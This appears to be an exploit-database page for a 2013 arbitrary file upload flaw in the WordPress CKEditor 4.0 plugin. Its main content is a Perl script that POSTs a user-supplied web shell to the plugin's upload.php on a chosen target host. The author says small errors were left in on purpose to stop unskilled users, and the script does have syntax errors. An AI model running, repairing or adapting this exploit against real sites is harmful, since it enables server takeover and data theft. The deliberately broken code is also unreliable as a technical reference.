Lucene search
K

Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit

🗓️ 07 Feb 2013 00:00:00Reported by sk0dType 
zdt
 zdt
🔗 0day.today👁 417 Views

Wordpress CKEditor 4.0 File Upload Vulnerabilit

Code
# Exploit-Title: Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
# Date: 2013-02-07
# Author: sk0d
# Software-Link: http://downloads.wordpress.org/plugin/ckeditor-for-wordpress.4.0.zip
# Version: 4.0
# Category: web-applications
# GoogleDork: n/a ----> NO! with little errors in sploitcode gainst kiddies :P
# Tested on: Ubuntu-Linux

# Use the following perlcode to upload a shell to compromise the system.
# A real hacker can correct the little errors ;-)




#!/usr/bin/perl

use strict;
use LWP::UserAgent;
use HTTP::Request::Common;

print <<INTRO;
- Wordpress plugin CKEditor 4.0 Arbitrary File Upload Exploit
- Vuln found and exploit written by sk0d SOH-Crew
- Contact: [email protected]
- Greetings: bd0rk, RaSsGoR, x0r_32
INTRO
print "Targethost: ";
chomp (my $tar=<STDIN>);
print "Directory: ";
chomp (my $shell=<STDIN>);

my $a = LWP::UserAgent->new;
my $b = $a->request(POST $tar.'/wp-content/plugins/ckeditor-for-wordpress/includes/upload.php';
Content_Type => 'form-data',
Content => [ NewFile => $shell ] );

if ($b->is_success) {
if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } else { print "Exploit failed! :(\n";
} else { print "Not connected with Target!\n"; }

exit;

#  0day.today [2018-04-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2013 00:00Current
7.1High risk
Vulners AI Score7.1
417